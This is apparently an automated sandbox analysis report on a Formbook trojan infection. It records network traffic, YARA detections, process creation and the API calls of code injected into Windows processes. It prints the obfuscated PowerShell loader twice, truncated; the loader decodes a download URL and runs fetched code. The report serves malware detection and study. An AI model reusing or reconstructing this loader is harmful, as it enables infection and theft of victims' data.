          Source: powershell.exe, 00000001.00000002.2387730069.000001F2AF194000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
          Source: powershell.exe, 00000001.00000002.2302097105.000001F29F59E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2302097105.000001F29F5BA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2302097105.000001F2A0DA5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2302097105.000001F2A0DA9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2302097105.000001F2A0D84000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2302097105.000001F29F5B6000.00000004.00000800.00020000.00000000.sdmp, wabmig.exe, 0000000A.00000003.2178455364.0000000005E76000.00000004.00000020.00020000.00000000.sdmp, wabmig.exe, 0000000A.00000003.2178528179.0000000005E76000.00000004.00000020.00020000.00000000.sdmp, wabmig.exe, 0000000A.00000003.2178455364.0000000005E6A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
          Source: powershell.exe, 00000001.00000002.2302097105.000001F29F59E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2302097105.000001F29F5BA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2302097105.000001F2A0DA5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2302097105.000001F2A0DA9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2302097105.000001F2A0D84000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2302097105.000001F29F5B6000.00000004.00000800.00020000.00000000.sdmp, wabmig.exe, 0000000A.00000003.2178455364.0000000005E76000.00000004.00000020.00020000.00000000.sdmp, wabmig.exe, 0000000A.00000003.2178528179.0000000005E76000.00000004.00000020.00020000.00000000.sdmp, wabmig.exe, 0000000A.00000003.2178455364.0000000005E6A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
          Source: powershell.exe, 00000001.00000002.2302097105.000001F29F59E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2302097105.000001F29F5BA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2302097105.000001F2A0DA5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2302097105.000001F2A0DA9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2302097105.000001F2A0D84000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2302097105.000001F29F5B6000.00000004.00000800.00020000.00000000.sdmp, wabmig.exe, 0000000A.00000003.2178455364.0000000005E76000.00000004.00000020.00020000.00000000.sdmp, wabmig.exe, 0000000A.00000003.2178528179.0000000005E76000.00000004.00000020.00020000.00000000.sdmp, wabmig.exe, 0000000A.00000003.2178455364.0000000005E6A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com
          Source: powershell.exe, 00000001.00000002.2302097105.000001F29F59E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2302097105.000001F29F5BA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2302097105.000001F2A0DA5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2302097105.000001F2A0DA9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2302097105.000001F2A0D84000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2302097105.000001F29F5B6000.00000004.00000800.00020000.00000000.sdmp, wabmig.exe, 0000000A.00000003.2178455364.0000000005E76000.00000004.00000020.00020000.00000000.sdmp, wabmig.exe, 0000000A.00000003.2178528179.0000000005E76000.00000004.00000020.00020000.00000000.sdmp, wabmig.exe, 0000000A.00000003.2178455364.0000000005E6A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.googletagmanager.com
          Source: powershell.exe, 00000001.00000002.2302097105.000001F29F59E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2302097105.000001F29F5BA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2302097105.000001F2A0DA5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2302097105.000001F2A0DA9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2302097105.000001F2A0D84000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2302097105.000001F29F5B6000.00000004.00000800.00020000.00000000.sdmp, wabmig.exe, 0000000A.00000003.2178455364.0000000005E76000.00000004.00000020.00020000.00000000.sdmp, wabmig.exe, 0000000A.00000003.2178528179.0000000005E76000.00000004.00000020.00020000.00000000.sdmp, wabmig.exe, 0000000A.00000003.2178455364.0000000005E6A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.com
          Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49732
          Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49731
          Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49730
          Source: unknown Network traffic detected: HTTP traffic on port 49731 -> 443
          Source: unknown Network traffic detected: HTTP traffic on port 49732 -> 443
          Source: unknown Network traffic detected: HTTP traffic on port 49730 -> 443
          Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49740
          Source: unknown Network traffic detected: HTTP traffic on port 49740 -> 443
          Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49739
          Source: unknown Network traffic detected: HTTP traffic on port 49739 -> 443
          Source: unknown HTTPS traffic detected: 142.250.185.110:443 -> 192.168.2.4:49730 version: TLS 1.2
          Source: unknown HTTPS traffic detected: 142.250.185.193:443 -> 192.168.2.4:49732 version: TLS 1.2
          Source: unknown HTTPS traffic detected: 142.250.185.110:443 -> 192.168.2.4:49739 version: TLS 1.2
          Source: unknown HTTPS traffic detected: 142.250.185.193:443 -> 192.168.2.4:49740 version: TLS 1.2

          E-Banking Fraud

          Source: Yara match File source: 0000000C.00000002.2981736437.0000000000940000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 0000000C.00000002.2979890759.0000000000390000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 0000000E.00000002.2981468701.0000000001200000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 0000000C.00000002.2981799081.00000000029A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 0000000B.00000002.2981578138.0000000003890000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 0000000A.00000002.2447450866.0000000022690000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 0000000A.00000002.2446978661.00000000216E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

          System Summary

          Source: 0000000C.00000002.2981736437.0000000000940000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 0000000C.00000002.2979890759.0000000000390000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 0000000E.00000002.2981468701.0000000001200000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 0000000C.00000002.2981799081.00000000029A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 0000000B.00000002.2981578138.0000000003890000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 0000000A.00000002.2447450866.0000000022690000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 0000000A.00000002.2446978661.00000000216E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: Initial file: Call Bankerstatning.ShellExecute(Skulpturere, Brislens149, "", "", Krltoppene)
          Source: C:\Windows\System32\wscript.exe Process created: Commandline size = 5192
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: Commandline size = 5227
          Source: C:\Windows\System32\cmd.exe Process created: Commandline size = 5193
          Source: C:\Windows\System32\wscript.exe COM Object queried: WBEM Locator HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}
          Source: C:\Windows\System32\wscript.exe COM Object queried: Windows Management and Instrumentation HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}
          Source: C:\Windows\System32\wscript.exe COM Object queried: Shell Automation Service HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{13709620-C279-11CE-A49E-444553540000}
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Debrief klargoeringstekniker overmortgaged Kernefrugterne chewers underrealises #>;$Nethes='Regreskravenes';<#hertugdoemmer Accessionernes Vitaminisering senvy #>;$Hawse=$host.PrivateData;If ($Hawse) {$Justerkammer++;}function Bisulc($supernumerary){$Frstestyrmand=$supernumerary.Length-$Justerkammer;for( $Entremess=3;$Entremess -lt $Frstestyrmand;$Entremess+=4){$Bar+=$supernumerary[$Entremess];}$Bar;}function Brdnidens($Naturaliseredes){ .($spectrographic) ($Naturaliseredes);}$Brnehospitalerne=Bisulc 'LocMDraoBrnz Tji M,l Fal la T /Ga,5Tan. f0Bog Vea(PilWDi iselnv ndD mo,alwslassta stNsanT To gro1Ov 0,et.Fac0Ov ;.to NonWCuri atnUnd6N,c4 Ch; ci ArbxUd,6For4Kn,;she HarNonv Fa:Non1N,n2fla1Mar.Naz0H m),ul MaG Cae axc nok H.oOps/ Ac2 lo0Teg1 uk0N n0slh1Vir0 Bo1hum stuF koiU tr kePelf .uo caxEw./ e1Bar2bol1Lan.pol0s,n ';$Paplike=Bisulc 'EndU epsH,uEs.bRshr-DepANa g K eAlgNN at Al ';$Overconfidences=Bisulc 'equhBultElstKiupsyssfra: .o/J.h/ sodK.nrBrni mav oeIsl.selgDemo A.ori,gKillsabeUnc. CacLsbo MumThe/Hu.u omcE g?ArbeHeixbilpDecoHemrUndtBla= ChdsnioFulwIndn uplTagoCema,oidDid&BaiiB uddom= .e1cyc-HarMIn 5FerLFu z UnL,ollsp,VTh hLaag Brmsam9End2 Re1KorZTigw selZe uNav8 arI ArQ.if3Te w.atK PrOHo u DiCMi 8innUWhi8ConqCornsal ';$Corbovinum=Bisulc ' sp>Tai ';$spectrographic=Bisulc 'suci NoE VeXpel ';$accretive='Aphanozygous';$Tilvrelsens = Bisulc '.useB nc Fohe nosc Gli%rimaUfop P.p.irdPelaY.ut rea il% ul\ ,oIHa.lBaadH rp A r onvHisePal. ppFThuoForkUn. Tr&Tvr& P Cue RucIndh.ncoTa. Fartink ';Brdnidens (Bisulc 'Uin$Vocg lvlMedoOscb raAx ls,i:AliR rivUdle empAffeFl,lcirsskoe PonMare re=Gru( rc P.msupd U. 
Ind/UndcUnd He $BilT BriProlBenvKalrdryeL,nlTetsupae klnMetsIsd)Din ');Brdnidens (Bisulc 'Int$geogDoklDe oskrbPr as ml Dr:,nhL IngHeteTr dDesoskimConms de C npatsB.r= Co$FryOAervDreeVanrConcKeloNonnAnafTr,iTvidCateTownGuacRuseUngsI.d.stas.urp bol Peic stPhy(War$st.CConoTelrsambBr oskuvTakiCurn houNonmPer)sce ');Brdnidens (Bisulc 'Ple[parN.ide,iltDek. ens sue Anr TevCriidolc BaeforPfiro Uaisemn Trt .mM Mia onnForasubg FleHalr in]Ir : U :BlisResePhoc stucirrBesiGrntWhuyIncP.inr Ego PatAf.oTrvcUn,oEnelEnt .at= Tu G [PelNCr,eslatArm. PosBa eG ocMa uArbrDo iscutBefysprPVelr C ostytDisos rcslaostil aaT atyEmipaxse Wa] Re:Dry:I.mTAl.lsessNe 1Pas2 .l ');$Overconfidences=$Lgedommens[0];$Continuums= (Bisulc ' wi$CepG DuL aroBagBNonA alL,em: CaMC laKn c H,RBliOEliRBruhse iUafNHjsUEugs o2Wi,1Fo,8o s=Moun Ave HyWM d- dfo KabPreJ.hoeBanCMexTIm EnrsDu yGevssipt U e ,uMOce.FolnMacE P T Un.BajwKylEE sBC lCD.dLOmdiUrbE ExNDa T');$Continuums+=$Rvepelsene[1];Brdnidens ($Continuums);Brdnidens (Bisulc 'cal$O aMAn a pcPlar Beo ntrDivhCroiPernsocuD ssB,r2 e1 Pl8 Os.sikHVe,e TraPupdKo eBearCtesRat[ Ec$InsPRa,aHygpLoblHaeiLolk GueO e]Tru=Uaf$Ut B s.rskrnsele H hKo oVers grpForiMant FraVillO.seMi rH.inPlaeMis ');$Kardinalen=Bisulc 'C,r$GruMClaaModc
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "<#Debrief klargoeringstekniker overmortgaged Kernefrugterne chewers underrealises #>;$Nethes='Regreskravenes';<#hertugdoemmer Accessionernes Vitaminisering senvy #>;$Hawse=$host.PrivateData;If ($Hawse) {$Justerkammer++;}function Bisulc($supernumerary){$Frstestyrmand=$supernumerary.Length-$Justerkammer;for( $Entremess=3;$Entremess -lt $Frstestyrmand;$Entremess+=4){$Bar+=$supernumerary[$Entremess];}$Bar;}function Brdnidens($Naturaliseredes){ .($spectrographic) ($Naturaliseredes);}$Brnehospitalerne=Bisulc 'LocMDraoBrnz Tji M,l Fal la T /Ga,5Tan. f0Bog Vea(PilWDi iselnv ndD mo,alwslassta stNsanT To gro1Ov 0,et.Fac0Ov ;.to NonWCuri atnUnd6N,c4 Ch; ci ArbxUd,6For4Kn,;she HarNonv Fa:Non1N,n2fla1Mar.Naz0H m),ul MaG Cae axc nok H.oOps/ Ac2 lo0Teg1 uk0N n0slh1Vir0 Bo1hum stuF koiU tr kePelf .uo caxEw./ e1Bar2bol1Lan.pol0s,n ';$Paplike=Bisulc 'EndU epsH,uEs.bRshr-DepANa g K eAlgNN at Al ';$Overconfidences=Bisulc 'equhBultElstKiupsyssfra: .o/J.h/ sodK.nrBrni mav oeIsl.selgDemo A.ori,gKillsabeUnc. CacLsbo MumThe/Hu.u omcE g?ArbeHeixbilpDecoHemrUndtBla= ChdsnioFulwIndn uplTagoCema,oidDid&BaiiB uddom= .e1cyc-HarMIn 5FerLFu z UnL,ollsp,VTh hLaag Brmsam9End2 Re1KorZTigw selZe uNav8 arI ArQ.if3Te w.atK PrOHo u DiCMi 8innUWhi8ConqCornsal ';$Corbovinum=Bisulc ' sp>Tai ';$spectrographic=Bisulc 'suci NoE VeXpel ';$accretive='Aphanozygous';$Tilvrelsens = Bisulc '.useB nc Fohe nosc Gli%rimaUfop P.p.irdPelaY.ut rea il% ul\ ,oIHa.lBaadH rp A r onvHisePal. ppFThuoForkUn. Tr&Tvr& P Cue RucIndh.ncoTa. Fartink ';Brdnidens (Bisulc 'Uin$Vocg lvlMedoOscb raAx ls,i:AliR rivUdle empAffeFl,lcirsskoe PonMare re=Gru( rc P.msupd U. 
Ind/UndcUnd He $BilT BriProlBenvKalrdryeL,nlTetsupae klnMetsIsd)Din ');Brdnidens (Bisulc 'Int$geogDoklDe oskrbPr as ml Dr:,nhL IngHeteTr dDesoskimConms de C npatsB.r= Co$FryOAervDreeVanrConcKeloNonnAnafTr,iTvidCateTownGuacRuseUngsI.d.stas.urp bol Peic stPhy(War$st.CConoTelrsambBr oskuvTakiCurn houNonmPer)sce ');Brdnidens (Bisulc 'Ple[parN.ide,iltDek. ens sue Anr TevCriidolc BaeforPfiro Uaisemn Trt .mM Mia onnForasubg FleHalr in]Ir : U :BlisResePhoc stucirrBesiGrntWhuyIncP.inr Ego PatAf.oTrvcUn,oEnelEnt .at= Tu G [PelNCr,eslatArm. PosBa eG ocMa uArbrDo iscutBefysprPVelr C ostytDisos rcslaostil aaT atyEmipaxse Wa] Re:Dry:I.mTAl.lsessNe 1Pas2 .l ');$Overconfidences=$Lgedommens[0];$Continuums= (Bisulc ' wi$CepG DuL aroBagBNonA alL,em: CaMC laKn c H,RBliOEliRBruhse iUafNHjsUEugs o2Wi,1Fo,8o s=Moun Ave HyWM d- dfo KabPreJ.hoeBanCMexTIm EnrsDu yGevssipt U e ,uMOce.FolnMacE P T Un.BajwKylEE sBC lCD.dLOmdiUrbE ExNDa T');$Continuums+=$Rvepelsene[1];Brdnidens ($Continuums);Brdnidens (Bisulc 'cal$O aMAn a pcPlar Beo ntrDivhCroiPernsocuD ssB,r2 e1 Pl8 Os.sikHVe,e TraPupdKo eBearCtesRat[ Ec$InsPRa,aHygpLoblHaeiLolk GueO e]Tru=Uaf$Ut B s.rskrnsele H hKo oVers grpForiMant FraVillO.seMi rH.inPlaeMis ');$Kardinalen=Bisulc 'C,r$GruMClaaMod
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Code function: 10_2_219B35C0 NtCreateMutant,LdrInitializeThunk,10_2_219B35C0
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Code function: 10_2_219B2DF0 NtQuerySystemInformation,LdrInitializeThunk,10_2_219B2DF0
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Code function: 10_2_219B2C70 NtFreeVirtualMemory,LdrInitializeThunk,10_2_219B2C70
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Code function: 10_2_219B3090 NtSetValueKey,10_2_219B3090
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Code function: 10_2_219B3010 NtOpenDirectoryObject,10_2_219B3010
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Code function: 10_2_219B4340 NtSetContextThread,10_2_219B4340
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Code function: 10_2_219B4650 NtSuspendThread,10_2_219B4650
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Code function: 10_2_219B39B0 NtGetContextThread,10_2_219B39B0
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Code function: 10_2_219B2B80 NtQueryInformationFile,10_2_219B2B80
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Code function: 10_2_219B2BA0 NtEnumerateValueKey,10_2_219B2BA0
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Code function: 10_2_219B2BF0 NtAllocateVirtualMemory,10_2_219B2BF0
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Code function: 10_2_219B2BE0 NtQueryValueKey,10_2_219B2BE0
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Code function: 10_2_219B2B60 NtClose,10_2_219B2B60
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Code function: 10_2_219B2AB0 NtWaitForSingleObject,10_2_219B2AB0
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Code function: 10_2_219B2AD0 NtReadFile,10_2_219B2AD0
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Code function: 10_2_219B2AF0 NtWriteFile,10_2_219B2AF0
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Code function: 10_2_219B2DB0 NtEnumerateKey,10_2_219B2DB0
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Code function: 10_2_219B2DD0 NtDelayExecution,10_2_219B2DD0
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Code function: 10_2_219B3D10 NtOpenProcessToken,10_2_219B3D10
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Code function: 10_2_219B2D10 NtMapViewOfSection,10_2_219B2D10
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Code function: 10_2_219B2D00 NtSetInformationFile,10_2_219B2D00
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Code function: 10_2_219B2D30 NtUnmapViewOfSection,10_2_219B2D30
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Code function: 10_2_219B3D70 NtOpenThread,10_2_219B3D70
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Code function: 10_2_219B2CA0 NtQueryInformationToken,10_2_219B2CA0
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Code function: 10_2_219B2CC0 NtQueryVirtualMemory,10_2_219B2CC0
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Code function: 10_2_219B2CF0 NtOpenProcess,10_2_219B2CF0
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Code function: 10_2_219B2C00 NtQueryInformationProcess,10_2_219B2C00
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Code function: 10_2_219B2C60 NtCreateKey,10_2_219B2C60
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Code function: 10_2_219B2F90 NtProtectVirtualMemory,10_2_219B2F90
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Code function: 10_2_219B2FB0 NtResumeThread,10_2_219B2FB0
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Code function: 10_2_219B2FA0 NtQuerySection,10_2_219B2FA0
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Code function: 10_2_219B2FE0 NtCreateFile,10_2_219B2FE0
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Code function: 10_2_219B2F30 NtCreateSection,10_2_219B2F30
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Code function: 10_2_219B2F60 NtCreateProcessEx,10_2_219B2F60
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Code function: 10_2_219B2E80 NtReadVirtualMemory,10_2_219B2E80
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Code function: 10_2_219B2EA0 NtAdjustPrivilegesToken,10_2_219B2EA0
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Code function: 10_2_219B2EE0 NtQueueApcThread,10_2_219B2EE0
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Code function: 10_2_219B2E30 NtWriteVirtualMemory,10_2_219B2E30
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Code function: 10_2_0477E682 Sleep,NtProtectVirtualMemory,10_2_0477E682
          Source: C:\Windows\SysWOW64\ktmutil.exe Code function: 12_2_02E44340 NtSetContextThread,LdrInitializeThunk,12_2_02E44340
          Source: C:\Windows\SysWOW64\ktmutil.exe Code function: 12_2_02E43090 NtSetValueKey,LdrInitializeThunk,12_2_02E43090
          Source: C:\Windows\SysWOW64\ktmutil.exe Code function: 12_2_02E44650 NtSuspendThread,LdrInitializeThunk,12_2_02E44650
          Source: C:\Windows\SysWOW64\ktmutil.exe Code function: 12_2_02E435C0 NtCreateMutant,LdrInitializeThunk,12_2_02E435C0
          Source: C:\Windows\SysWOW64\ktmutil.exe Code function: 12_2_02E42AF0 NtWriteFile,LdrInitializeThunk,12_2_02E42AF0
          Source: C:\Windows\SysWOW64\ktmutil.exe Code function: 12_2_02E42AD0 NtReadFile,LdrInitializeThunk,12_2_02E42AD0
          Source: C:\Windows\SysWOW64\ktmutil.exe Code function: 12_2_02E42BE0 NtQueryValueKey,LdrInitializeThunk,12_2_02E42BE0
          Source: C:\Windows\SysWOW64\ktmutil.exe Code function: 12_2_02E42BF0 NtAllocateVirtualMemory,LdrInitializeThunk,12_2_02E42BF0
          Source: C:\Windows\SysWOW64\ktmutil.exe Code function: 12_2_02E42BA0 NtEnumerateValueKey,LdrInitializeThunk,12_2_02E42BA0
          Source: C:\Windows\SysWOW64\ktmutil.exe Code function: 12_2_02E42B60 NtClose,LdrInitializeThunk,12_2_02E42B60
          Source: C:\Windows\SysWOW64\ktmutil.exe Code function: 12_2_02E439B0 NtGetContextThread,LdrInitializeThunk,12_2_02E439B0
          Source: C:\Windows\SysWOW64\ktmutil.exe Code function: 12_2_02E42EE0 NtQueueApcThread,LdrInitializeThunk,12_2_02E42EE0
          Source: C:\Windows\SysWOW64\ktmutil.exe Code function: 12_2_02E42E80 NtReadVirtualMemory,LdrInitializeThunk,12_2_02E42E80
          Source: C:\Windows\SysWOW64\ktmutil.exe Code function: 12_2_02E42FE0 NtCreateFile,LdrInitializeThunk,12_2_02E42FE0
          Source: C:\Windows\SysWOW64\ktmutil.exe Code function: 12_2_02E42FB0 NtResumeThread,LdrInitializeThunk,12_2_02E42FB0
          Source: C:\Windows\SysWOW64\ktmutil.exe Code function: 12_2_02E42F30 NtCreateSection,LdrInitializeThunk,12_2_02E42F30
          Source: C:\Windows\SysWOW64\ktmutil.exe Code function: 12_2_02E42CA0 NtQueryInformationToken,LdrInitializeThunk,12_2_02E42CA0
          Source: C:\Windows\SysWOW64\ktmutil.exe Code function: 12_2_02E42C60 NtCreateKey,LdrInitializeThunk,12_2_02E42C60
          Source: C:\Windows\SysWOW64\ktmutil.exe Code function: 12_2_02E42C70 NtFreeVirtualMemory,LdrInitializeThunk,12_2_02E42C70
          Source: C:\Windows\SysWOW64\ktmutil.exe Code function: 12_2_02E42DF0 NtQuerySystemInformation,LdrInitializeThunk,12_2_02E42DF0
          Source: C:\Windows\SysWOW64\ktmutil.exe Code function: 12_2_02E42DD0 NtDelayExecution,LdrInitializeThunk,12_2_02E42DD0
          Source: C:\Windows\SysWOW64\ktmutil.exe Code function: 12_2_02E42D30 NtUnmapViewOfSection,LdrInitializeThunk,12_2_02E42D30
          Source: C:\Windows\SysWOW64\ktmutil.exe Code function: 12_2_02E42D10 NtMapViewOfSection,LdrInitializeThunk,12_2_02E42D10
          Source: C:\Windows\SysWOW64\ktmutil.exe Code function: 12_2_02E43010 NtOpenDirectoryObject,12_2_02E43010
          Source: C:\Windows\SysWOW64\ktmutil.exe Code function: 12_2_02E42AB0 NtWaitForSingleObject,12_2_02E42AB0
          Source: C:\Windows\SysWOW64\ktmutil.exe Code function: 12_2_02E42B80 NtQueryInformationFile,12_2_02E42B80
          Source: C:\Windows\SysWOW64\ktmutil.exe Code function: 12_2_02E42EA0 NtAdjustPrivilegesToken,12_2_02E42EA0
          Source: C:\Windows\SysWOW64\ktmutil.exe Code function: 12_2_02E42E30 NtWriteVirtualMemory,12_2_02E42E30
          Source: C:\Windows\SysWOW64\ktmutil.exe Code function: 12_2_02E42FA0 NtQuerySection,12_2_02E42FA0
          Source: C:\Windows\SysWOW64\ktmutil.exe Code function: 12_2_02E42F90 NtProtectVirtualMemory,12_2_02E42F90
          Source: C:\Windows\SysWOW64\ktmutil.exe Code function: 12_2_02E42F60 NtCreateProcessEx,12_2_02E42F60
          Source: C:\Windows\SysWOW64\ktmutil.exe Code function: 12_2_02E42CF0 NtOpenProcess,12_2_02E42CF0
          Source: C:\Windows\SysWOW64\ktmutil.exe Code function: 12_2_02E42CC0 NtQueryVirtualMemory,12_2_02E42CC0
          Source: C:\Windows\SysWOW64\ktmutil.exe Code function: 12_2_02E42C00 NtQueryInformationProcess,12_2_02E42C00
          Source: C:\Windows\SysWOW64\ktmutil.exe Code function: 12_2_02E42DB0 NtEnumerateKey,12_2_02E42DB0
          Source: C:\Windows\SysWOW64\ktmutil.exe Code function: 12_2_02E43D70 NtOpenThread,12_2_02E43D70
          Source: C:\Windows\SysWOW64\ktmutil.exe Code function: 12_2_02E42D00 NtSetInformationFile,12_2_02E42D00
          Source: C:\Windows\SysWOW64\ktmutil.exe Code function: 12_2_02E43D10 NtOpenProcessToken,12_2_02E43D10
          Source: C:\Windows\SysWOW64\ktmutil.exe Code function: 12_2_003B9070 NtClose,12_2_003B9070
          Source: C:\Windows\SysWOW64\ktmutil.exe Code function: 12_2_003B91E0 NtAllocateVirtualMemory,12_2_003B91E0
          Source: C:\Windows\SysWOW64\ktmutil.exe Code function: 12_2_003B8D50 NtCreateFile,12_2_003B8D50
          Source: C:\Windows\SysWOW64\ktmutil.exe Code function: 12_2_003B8EC0 NtReadFile,12_2_003B8EC0
          Source: C:\Windows\SysWOW64\ktmutil.exe Code function: 12_2_003B8FC0 NtDeleteFile,12_2_003B8FC0
          Source: C:\Windows\SysWOW64\ktmutil.exe Code function: 12_2_02C2F06D NtQueryInformationProcess,12_2_02C2F06D
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219BDBF910_2_219BDBF9
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21A36BD710_2_21A36BD7
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21A3FB7610_2_21A3FB76
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21A3AB4010_2_21A3AB40
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21A1DAAC10_2_21A1DAAC
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_2197EA8010_2_2197EA80
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219C5AA010_2_219C5AA0
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21A2DAC610_2_21A2DAC6
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21A37A4610_2_21A37A46
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21A3FA4910_2_21A3FA49
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219F3A6C10_2_219F3A6C
